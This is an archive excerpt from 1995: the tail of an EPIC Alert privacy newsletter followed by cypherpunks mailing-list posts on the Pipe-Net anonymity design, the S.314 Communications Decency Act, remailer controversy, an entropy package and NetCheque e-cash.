the creation of an ID card but backed off in the face of public
opposition.

Senator Alan Simpson (R-WY) has introduced a bill (S. 269) to
implement the registry.  Sen. Barbara Boxer (D-CA) told USA Today that
Congress was planning to address the issue and that the system is the
only way to provide accurate citizenship information and protect
privacy.


=======================================================================
[6] Overview of New Congressional Privacy Legislation Available
=======================================================================

EPIC has produced an overview of current privacy legislation in the
104th Congress.  Bills that improve privacy protections or negatively
affect privacy are summarized.  The summary will be updated regularly
as new legislation is introduced or pending bills are revised. A
summary will appear in the next issue of the EPIC Alert.

Copies of the new bills are available for retrieval from the EPIC
Archive at cpsr.org.  Also included are floor statements on the
legislation when available and updates on the status of the bills.

To obtain the overview and copies of the house and Senate bills,
ftp/gopher/wais to cpsr.org /cpsr/privacy/epic/104th_congress_bills/


=======================================================================
[7] Upcoming Privacy Related Conferences and Events
=======================================================================

AAAS Annual Meeting & Science Innovation Expo.  Atlanta. Feb 16-21. A
special full-day session on cryptography and privacy will take place
on Tuesday, Feb. 21. Contact: Alex Fowler 202/326-7016 or
afowler@aaas.org

Cryptography: Technology, Law and Economics. New York City. Mar. 3,
1995. Sponsored by CITI, Columbia University. Contact:
citi@research.gsb.columbia.edu

Towards an Electronic Patient Record '95. Orlando, FL. Mar. 14-19,
1995. Sponsored by Medical Records Institute. Contact: 617-964-3926
(fax).

Access, Privacy, and Commercialism:  When States Gather Personal
Information. College of William and Mary, Williamsburg, VA, March 17.
Contact:  Trotter Hardy  804 221-3826.

Computers, Freedom and Privacy '95. Palo Alto, Ca. Mar. 28-31, 1995.
Sponsored by ACM. Contact: cfp95@forsythe.stanford.edu.

ETHICOMP95:  An international conference on the ethical issues of
using Information Technology. DeMontfort University, Leicester,
ENGLAND, March 28-30, 1995.  Contact: Simon Rogerson srog@dmu.ac.uk 44
533 577475 (phone)  44 533 541891 (Fax).

"Quality of Life in the Electronic Village," March 30, 1995. Live
teleconference, broadcast nationally from Virginia Tech, featuring
eminent presenters from the fields of ethics, law, education,
anthropology, medicine, and government.  Contact 703/231-6476 or
choices@vt.edu.

National Net '95: Reaching Everyone. Washington, DC.  Apr. 5-7, 1995.
Sponsored by EDUCOM.  Contact: net95@educom.edu or call 202/872-4200.

Information Security and Privacy in the Public Sector. Herndon, VA.
Apr. 19-20, 1995. Sponsored by AIC Conferences.  Contact:
212/952-1899.

1995 IEEE Symposium on Security and Privacy. Oakland, CA, May 8-10.
Contact:  sp95@itd.nrl.navy.mil.

INET '95. Honolulu, HI. June 28-30, 1995. Sponsored by the Internet
Society. Contact inet95@isoc.org.

Key Players in the Introduction of Information Technology: Their
Social Responsibility and Professional Training. July 5-6-7, 1995.
Namur, Belgium. Sponsored by CREIS. Contact: nolod@ccr.jussieu.fr.

Advanced Surveillance Technologies. Sept. 4-5, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@epic.org.

          (Send calendar submissions to Alert@epic.org)
  
=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center. To subscribe, send the message:

SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org. You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via FTP/WAIS/Gopher/HTTP from cpsr.org
/cpsr/alert and on Compuserve (Go NCSA), Library 2 (EPIC/Ethics). An
HTML version of the current issue is available from
epic.digicash.com/epic

=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility.  EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues.  For more information, email info@epic.org, WWW at
HTTP://epic.digicash.com /epic or write EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel), (202)
547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose Clipper and Digital Telephony wiretapping proposals.

------------------------ END EPIC Alert 2.02 ------------------------







_________________________________________________________________________
Subject: EPIC Alert 2.02
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 19:29:22 PST
To: weidai@eskimo.com
Subject: RE: a new way to do anonymity
Message-ID: <Chameleon.4.01.950207192939.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This is what I wrote:

>> Imagine a server that allows you to open a 
>> low bandwidth (let's say around 100 cps, in order to reduce costs)
>> link-encrypted telnet session with it, and provides you with a number 
>> of services, for example a link-encrypted talk session with another 
>> user.  You'll need to maintain the link 24 hours a day to defend 
>> against statistical analysis, and of course you can chain a number of 
>> these servers together in a way similiar to chaining remailers.

There are many, many analogies you can draw about a network of this type
to an ATM (asynchronous transfer mode) network.  By simplifying just slightly
from what you describe to only include an encrypted, switched-pipe methodology,
you now have a "cloud" type network with service entry points that are defined
by a pair of byte streams (one in each direction).

The switched path could be set up and torn down dynamically by the user by
interacting with the "switch" at each point to select the next hop the 
encrypted byte stream will follow.  Of course, just like in remailer chaining,
the data that indicates which hop to follow is encrypted with the data in a
form only the switch can decrypt.  Alternatively, once a path is set up between
switches, it can be assigned a virtual path identifier that has only local
significance at each hop, with the switch performing a lookup to forward
packets and substituting a new path number with significance at the next hop.

The above description is pretty unclear, I think, but many of these concepts 
have been fleshed out to a significant amount of detail in ATM circles.

Fixed length data packets (at the encrypted telnet level) also make it very
easy to aggregate individual circuits into higher bandwidth pipes that
connect server to server.  With these continuously running with cover traffic,
individual circuit establishment is much more immune from traffic analysis.
Cover traffic is substituted with real traffic as necessary, up to the bandwidth
of the pipe.

To summarize, what has been described is a method to establish a "network within
a network", using encrypted telnet, to provide a connection oriented, unreliable
packet switched link layer protocol.  Sounds remarkably similar to IP (except
for the connection oriented portion of it.)

What can you do with a network like this?  By layering a TCP process on top of 
this "Pipe-Net" IP like service, any of the standard TCP based application 
protocols can function between two end point systems, such as SMTP, FTP, HTTP,
etc.

What is so neat about this is that it could probably be done in user space,
and since the packet based protocol is defined as unreliable, switches could
come and go, with some sort of switch-to-switch protocol that propagates route
availability.

Eric, you could probably chew on the trust implications of all this.

Perry, I'm sure all the IPSP/SSL/SOCKS/whatever stuff you know so well could
provide a lot of building blocks for this type of thing.

Wei, your traffic analysis treatment of this sort of thing would go a long way
toward uncovering weaknesses and determining operational requirements and 
limitations.

Tim, what massive social effects would it have if this type of network service
were to become widely deployed? :)

At first glance, this Pipe-Net idea doesn't seem to take a lot of rocket science; 
it seems that most of the components or algorithms are are already in use, just 
in a very different way.

I can think of a number of problems already, however.  Spamming.  Bandwidth
limitations.  Complexity of client and switch software.  Standards.  Flow
control.

In other works, all the stuff the ATM forum is already dealing with :)

Come to think of it, has anyone thought of something like this before?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzg6ME1Diok8GKihAQEBygP/do7MnM2Ha/b3nYNeVb/7mpJqAwgke3D6
VlyhtVjxTM2tn42Voz47BtwTMiR+zkiwI5Ha3EQs/fpJGY7x69YGY+arGXAn/VsI
Xq7/onQd/LOv8JAjrxrgH2gLTCmfs57+sLJXqghHmSrxgothsK8XRLY1HDoYDfai
EgiNUmMTXEM=
=ENYC
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Tue, 7 Feb 95 16:40:39 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950207193831.7816I-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995, Samuel Kaplin wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I just had an interesting conversation with a person who works for an ISP.
> Basically their response if S.314 becomes law will be to preprocess all
> incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
> go. They are still thinking about what to do with telnet and ftp.

Just use netnews for mail then.  We can divide up netnews into different 
regions pgp.us.ca.north  pgp.us.ca.south etc. and then just post pgp'd 
messages to the net.  Kinda like blacknet.  Ok so there's a high cost 
involved in it, granted.

Also writing a bot to search through net news daily for anything signed 
with your PGP key isn't too difficult.

> This is starting to get very scary.

Indeed citizen-unit.  Wait over in the corner for processing.

Ben.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 7 Feb 95 11:14:35 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
In-Reply-To: <199502071708.JAA17106@tower.techwood.org>
Message-ID: <Pine.HPP.3.91.950207184635.26403A@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> The remailer crisis is far from over.

And the other kind of remailer - Julf style - might possibly be
in a crisis too. One of the Horsemen (Pedo) hit Sweden in a
heavier way than ever before, yesterday. Top front page article
in a leding newspaper followed up in the evening news on a main
national TV channel. Another newspaper article today but still
beginning on the front page ('Intermediary admits to computer porno'). 
Guess who is the intermediary. Both newspaper (with big picture)
and TV interviews with Johan Helsingius (Julf), who belongs to the
minority in Finland having Swedish as their mother's tounge.
The story starts with some joker at Stockholm University, dep of
Computer Science, who has made a study of alt.binary.pictures.erotica
and have found that one percent of the material is 'nude pictures of
girls and boys 8-10 years of age' and that 'most of the child-pictures
have bounced through Johan Helsingius' computer in Helsingfors'. 
Mr Helsingius says that he is very concerned and (picture subtitle:) 
'lies awake at night'. The big fat hedline on top of his picture 
says: 'This is where the kiddie porn is spreading from'. I guess
this is big "news" in Finland also, there are close media connections
between our countries. 'I don't want to reveal their addresses, only
that it concerns people in Germany and a multi-national organization
in the US' says Mr Helsingius about who are responsible for the kiddie
porn. But then he also gets a chance to talk about the benefits (abused,
political dissidents - the usual). Todays article also mention cypherpunks
remailers (although not by name).

I don't know - this just might be yesterdays news tomorrow. Kiddie porn
per se whistle-blowing is slowly getting out of fashion here, it's only
the net connection that makes it headline news. But there is a chance
some politician will try to score on this story and, as mentioned above,
the ties on that level between Helsingfors and Stockholm are strong.
We have to wait and see.

I'm getting to think that SAFE anonymous posting will need IP spoofing,
or worse (things that I know nothing about, please correct me if I'm
totally out in the blue here).

Mats

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Tue, 7 Feb 95 20:07:44 PST
To: entropy@intnet.net
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <9502072307.aa27535@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


>> Thats because the providers never package things up cleanly. If they
>> sent a client on a disk, a la AOL, and they set things up to
>> autoconfigure, they'd never need to speak to the clients.
>
>    You've obviously never attempted to get a Windows product working for 
>someone whose previous experience with a computer is limited to "Solitaire".
>
>    I've done work with this ISP, and I can tell you it's nearly the most 
>frustrating experience I've had in my life -- Windows has bizzare 
>conflicts with software eating other software, ports getting set up 
>wrong, and just general nastiness.  Even the slickest software needs 
>helpline time - for whatever reason.

   I hate jumping in when I may be completely off base but...

   NT and (possibly Winodws97) may solve some of this, mainly through better
controll over devices and protected memory. I recently installed some NT
services, HTTP server, and Time Service (to get time off a trusted host).
The HTTP server was installed and working in 5 minutes.  I'm a little more
advanced than the typical "Solitare junky", but I was amazed at the ease of
install and controll that some of this stuff gives you.  I would probably
spend atleast 30+ minutes trying to get them properly installed on my UNIX host.
                                     ...  __o
                                    ..   `\<,
Chris.Claborne@SanDiegoCA.ATTGIS.COM...(_)/(_).            CI$: 76340.2422
---------------------------------------------------------------------------
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Available on any Pub Key server.
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 20:10:39 PST
To: cypherpunks@toad.com
Subject: Re: a new way to do anonymity
In-Reply-To: <199502080132.AA26151@mail.eskimo.com>
Message-ID: <199502080409.UAA22376@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Wei Dai" <weidai@eskimo.com>

   P.S. I never gave a name for the protocol... let's call it Pipe-net.

I don't think we really need a separate name for it just yet.  The
idea is composed of two pretty much independent elements: packet
forwarding and virtual link encryption.  These can be implemented
separately and then combined to yield the kind of network interaction
described.

Getting the details right will be difficult, and I'd suggest that is
where the discussion might profitably turn next.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 20:23:52 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
In-Reply-To: <Chameleon.4.01.950207192939.jcorgan@comet.aeinet.com>
Message-ID: <199502080422.UAA22395@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@aeinet.com>

   There are many, many analogies you can draw about a network of this
   type to an ATM (asynchronous transfer mode) network.  

Thank you for the analogy.  It's always good not to reinvent the wheel
when you don't need to.

   The switched path could be set up and torn down dynamically by the user by
   interacting with the "switch" at each point to select the next hop the 
   encrypted byte stream will follow.

When you set up a mapping on a packet forwarder, this is exactly the
kind of initialization that would be required.  It is also at this
point that keying would be negotiated, etc.

   Fixed length data packets (at the encrypted telnet level) also make it very
   easy to aggregate individual circuits into higher bandwidth pipes that
   connect server to server.

Now here's an important detail that needs to get done right.  Is the
forwarding for fixed length packets, variable length packets, or
streams?  Is this decision global or local?  What are the latency and
aggregatation effects?  How important are these for different classes
of data?  (telnet v. voice, e.g.)

I'd suggest just getting something running first, to get some
prototyping experience.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 7 Feb 95 17:48:48 PST
To: strick@techwood.com
Subject: Re: noiz-0.5: simple noise-emitting package
Message-ID: <9502080149.AA20768@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


This looks really cute, especially given the ability to "precompute"
entropy before the process that needs it is running.

An interface I'd rather see is one that allows a process to grab
random bits that it can be sure are not correlated to bits that
have been given to other processes.  Since everything runs asynchronously
with cron, you have no way of knowing how much time has elapsed since
the last time the file was read or updated, and hence don't know
how "fresh" the bits are.  Also, /etc/noiz is an attractive target
on multi-user machines....

So I'd rather see a /dev/noise, although a portable implementation
of somthing like that is out of the question now that there are
10 gazillion unix vendors.  Perhaps a more reasonable implementation
would be a tcp or rpc service that processes can query to get random bits,
where the server delays responding until it can guarantee that its
state is sufficiently decorrelated from previous responses.  Because you can
"bank up" entropy during idle periods, most requests could probably
be served without delay, making this technique a real advantage over
just implementing the same functions in a library called directly.
(Since good randomness is still rather expensive even when you can store it
up, and useless when sent over a network, you'd probably want the noise
server to refuse requests from outside the local machine.)

Anyway, I'm looking forward to playing with it.  It's a very nice idea.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 7 Feb 95 19:34:36 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SUN.3.91.950207193831.7816I-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <g53ElKjqRy8I078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 7 Feb 1995 19:40:24 -0500 (EST), Ben <samman@CS.YALE.EDU> wrote:

> Just use netnews for mail then.  We can divide up netnews into different
> regions pgp.us.ca.north  pgp.us.ca.south etc. and then just post pgp'd
> messages to the net.  Kinda like blacknet.  Ok so there's a high cost
> involved in it, granted.

The problem is that providers will be responsible for all traffic coming in
and going out of their system. This includes usenet. I would imagine that
the same filters would be applied to news too.

I think we need to start lobbying now. I find it amazing that CPR and EFF
haven't picked this up yet.

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
         "Automatic" simply means that you cannot repair it yourself.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzg6EclnXxBRSgfNAQEV3Qf+I/Cvkl/4qmCS9InIoECaMf0zqn9ou1G+
W9zB12a15WcbVa71DuToq1CJ8P4pTCwNObDY6L1asn+o5/aMxcSHDlBBBeGFCZBe
dtbKFoOPquQ4w+VWDorqDbZhDkQf38CyK325O5L7hkzEYiw6r2RIu8s6ZyHL6mIh
+h2qlW+HCn+34Q5JM/Ogek3V65kVc605bafkTELhPtMn1j6cLlzF/ZbXK7ecgphu
IBwKsxReOb/TNwZP3FacuM+gLxOtaQlIFTRJsFA6sNWqbbk8E3J7mc6Inoibi/DZ
LFeBIFZ2VNctYMUxZgOs6eJeU0kyEh0p637wga/NOvkge+cJZp8RGw==
=Szsj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Tue, 7 Feb 95 21:26:30 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <9502072124.aa20836@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


For my congresional 'representatives'.

S.314 is not a moral bill.  Making the owner of a computer (or
computer network) responsible for what its users store (or transmit)
is like making the owners of a parking lot responsible for what is
stored in the cars parked there.  It just isn't moraly reasonable.

S.314 is un-American.  America has always been a place where speach is
freeest.  We have consistently held the expression of ideas to be one
of the very most important rights.  To hold the owner of a buliten
board responsible for the illegal messages posted to it, is to force
the buliten board owner to become a government censor in all but name
(and wages).  It effectively ends the bulliten board's use as a venue
of free speach.

S.314 is harmfull to America.  The kind of 'chilling effect' this bill
wil place on the computer (networking) industry would put american
companies at a serious disadvantage.  Could I really operate an
airline reservtion system for a large airline if I could be held
liable for illegal information transmitted using my equipment?  No.
Could I operate the masive software and hardware networks that the
phone system requires?  No.  But, I bet the company I own in Mexico,
or in Canada could.  They aren't burdened with such (artificially
created) liabilities.  Or perhaps I could get a special waiver from my
friends in Washington. Hmmm.  How much will these sorts of 'work
arounds' cost american bussiness?

S.314 is not enforceable.  There is no certain way to tell if a file
of data is an illegal one.  Stegnography and cryptography, along with
the fact that what a bit means depends on which programs are used to
interpret it, mean that even this message could be porno, terrorist
threats, or arangements for drug trafficing.  Imagin searching all the
cars in your parking lot for drugs.  Very expensive, and not very
reliable.  Tons of drugs travel past just such inspection sites each
year.  Now imagine how tough it would be if the drugs could be turned
into perfectly normal steal in the body panels of the vehicles!  That
is what stegnography and cryptography do to data.  Turn perfectly
'awfull' data into data perfectly indistinguishable from noise, and
then hide the noise as indistinguishable-from-inocent 'errors' in
other data.  Concider the spelling in this message -- convert each
word into a bit -- 1 if it is speled right, 0 if not.  Or how about
spacing, or, punctuation -- Hmmm.  Now supose we add otras idiomas,
aux eble muchos languages en cxiu mesagxon.  Will computer (network)
owners be responsible for the spelling, punctuation, language, word
choice, and grammer of all the electronic mail sent, received, and
stored?

S.314 is bad for *your* career.  If you vote to support it, I will
vote against you in upcoming elections.  I will work to impeach you.
I will never employ you, I will not read your memoirs, I will not do
business with you in any way what so ever.

I urge you to think twice, and then vote no on S.314.

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 7 Feb 95 21:27:31 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v03001400ab5e06968201@[140.174.229.225]>
MIME-Version: 1.0
Content-Type: text/plain


>Can anyone confirm this S.314 thing?  It sounds an awful lot like
>the "modem tax" and other urban legends.

S 314 IS
104th CONGRESS
1st Session
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
                 IN THE SENATE OF THE UNITED STATES
           February 1 (legislative day, January 30), 1995
Mr. Exon (for himself and Mr. Gorton) introduced the following
    bill; which was read twice and referred to the Committee on
    Commerce, Science, and Transportation
                               A BILL
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
  Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
  This Act may be cited as the `Communications Decency Act of 1995'.
SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES
                  UNDER THE COMMUNICATIONS ACT OF 1934.
  (a) Offenses: Section 223 of the Communications Act of 1934 (47
U.S.C. 223) is amended--
      (1) in subsection (a)(1)--
          (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device';
          (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any
        comment, request, suggestion, proposal, image, or other
        communication';
          (C) by striking out subparagraph (B) and inserting the
        following:
          `(B) makes a telephone call or utilizes a
        telecommunications device, whether or not conversation or
        communications ensues, without disclosing his identity and
        with intent to annoy, abuse, threaten, or harass any person
        at the called number or who receives the communication;' and
          (D) by striking out subparagraph (D) and inserting the
        following:
          `(D) makes repeated telephone calls or repeatedly
        initiates communication with a telecommunications device,
        during which conversation or communication ensues, solely
        to harass any person at the called number or who receives
        the communication; or';
      (2) in subsection (a)(2), by striking `telephone facility'
    and inserting `telecommunications facility';
      (3) in subsection (b)(1)--
          (A) in subparagraph (A)--
              (i) by striking `telephone' and inserting
            `telecommunications device'; and
              (ii) inserting `or initiated the communication' and
            `placed the call', and
          (B) in subparagraph (B), by striking `telephone facility'
        and inserting `telecommunications facility'; and
      (4) in subsection (b)(2)--
          (A) in subparagraph (A)--
              (i) by striking `by means of telephone, makes' and
            inserting `by means of telephone or telecommunications
            device, makes, knowingly transmits, or knowingly makes
            available'; and
              (ii) by inserting `or initiated the communication'
            after `placed the call'; and
          (B) in subparagraph (B), by striking `telephone facility'
        and inserting in lieu thereof `telecommunications facility'.
  (b) Penalties: Section 223 of such Act (47 U.S.C. 223) is amended--
      (1) by striking out `$50,000' each place it appears and
    inserting `$100,000'; and
      (2) by striking `six months' each place it appears and
    inserting `2 years'.
  (c) Prohibition on Provision of Access: Subsection (c)(1) of such
section (47 U.S.C. 223(c)) is amended by striking `telephone' and
inserting `telecommunications device.'
  (d) Conforming Amendment: The section heading for such section is
amended to read as follows:
`obscene or harassing utilization of telecommunications devices and
facilities in the district of columbia or in interstate or foreign
communications'.
SEC. 3. OBSCENE PROGRAMMING ON CABLE TELEVISION.
  Section 639 of the Communications Act of 1934 (47 U.S.C. 559) is
amended by striking `$10,000' and inserting `$100,000'.
SEC. 4. BROADCASTING OBSCENE LANGUAGE ON RADIO.
  Section 1464 of title 18, United States Code, is amended by
striking out `$10,000' and inserting `$100,000'.
SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
  Section 2511 of title 18, United States Code, is amended--
      (1) in paragraph (1)--
          (A) by striking `wire, oral, or electronic communication'
        each place it appears and inserting `wire, oral,
        electronic, or digital communication', and
          (B) in the matter designated as `(b)', by striking `oral
        communication' in the matter above clause (i) and inserting
        `communication'; and
      (2) in paragraph (2)(a), by striking `wire or electronic
    communication service' each place it appears (other than in the
    second sentence) and inserting `wire, electronic, or digital
    communication service'.
SEC. 6. ADDITIONAL PROHIBITION ON BILLING FOR TOLL-FREE TELEPHONE
                  CALLS.
  Section 228(c)(6) of the Communications Act of 1934 (47 U.S.C.
228(c)(6)) is amended--
      (1) by striking `or' at the end of subparagraph (C);
      (2) by striking the period at the end of subparagraph (D) and
    inserting a semicolon and `or'; and
      (3) by adding at the end thereof the following:
          `(E) the calling party being assessed, by virtue of being
        asked to connect or otherwise transfer to a pay-per-call
        service, a charge for the call.'.
SEC. 7. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
  Part IV of title VI of the Communications Act of 1934 (47 U.S.C.
551 et seq.) is amended by adding at the end the following:
`SEC. 640. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
  `(a) Requirement: In providing video programming unsuitable for
children to any subscriber through a cable system, a cable operator
shall fully scramble or otherwise fully block the video and audio
portion of each channel carrying such programming so that one not a
subscriber does not receive it.
  `(b) Definition: As used in this section, the term `scramble'
means to rearrange the content of the signal of the programming so
that the programming cannot be received by persons unauthorized to
receive the programming.'.
SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS.
  (a) Public, Educational, and Governmental Channels: Section
611(e) of the Communications Act of 1934 (47 U.S.C. 531(e)) is
amended by inserting before the period the following: `, except a
cable operator may refuse to transmit any public access program or
portion of a public access program which contains obscenity,
indecency, or nudity'.
  (b) Cable Channels for Commercial Use: Section 612(c)(2) of the
Communications Act of 1934 (47 U.S.C. 532(c)(2)) is amended by
striking `an operator' and inserting `a cable operator may refuse
to transmit any leased access program or portion of a leased access
program which contains obscenity, indecency, or nudity.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Tue, 7 Feb 95 21:39:19 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950207230934.23719A-100000@mirage.skypoint.com>
Message-ID: <9502072138.aa29510@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


Uh oh!  Egg on my face.  Will someone explain to me how the amendments
in S.314 make owners of ISPs or other computer systems liable for
'bad' data?  I apologize for my previous uncalled for (so it seams to
me now) ranting.

j*blushing*'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Huntting <huntting@glarp.com>
Date: Tue, 7 Feb 95 20:46:01 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
Message-ID: <199502080445.VAA00395@misc.glarp.com>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone confirm this S.314 thing?  It sounds an awful lot like
the "modem tax" and other urban legends.


brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Tue, 7 Feb 95 18:47:04 PST
To: cypherpunks@toad.com (Good Guys)
Subject: forward; e-cash
Message-ID: <199502080246.AA02904@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


NETCHEQUE WANTS TO BE YOUR CYBERBANKER The long-anticipated digital
commerce boom hinges on one important factor -- the ability to safely
and securely conduct monetary transactions in cyberspace. A team of
scientists at the University of Southern California are working on a
system called NetCheque that would allow banks and their customers
send an electronic check over the Internet, complete with a digital
signature that cannot be forged. "With NetCheque, if your balances are
positive it's like a checking account. If they're negative, it's like
a credit-card account... It really depends very much on how you want
to set up this very flexible mechanism," says the USC team leader. The
system was recently released for testing, and those interested in
participation should send mail to netcheque@isi.edu. (Chronicle of
Higher Education 2/10/95 A18)

-- 
Harry S. Hawk  		   habs@panix.com
Product Marketing Manager
PowerMail, Inc. 	   Producers of MailWeir(tm) & PowerServ(tm)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 21:50:50 PST
To: huntting@glarp.com (Brad Huntting)
Subject: S.314, the "Pi Bill"
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <199502080547.VAA28367@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Brad Huntting wrote:

> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.
> 
> 

I wrote a post to comp.org.eff.talk in which I asked if "S.314" isn't
just the "Pi Bill," in which pi = 3.14 is mandated to be pi = 3.00.

S.314 I initially, for a minute or so, thought to be a put-on, a
spoof. But the text lacked other signs of humor and had the trappings
of a real bill. And then versions from reputable groups began to
appear, so I was of course convinced it was real.

If it's a spoof, it's too cute by half.

--Tim May

-- 
..........................................................................
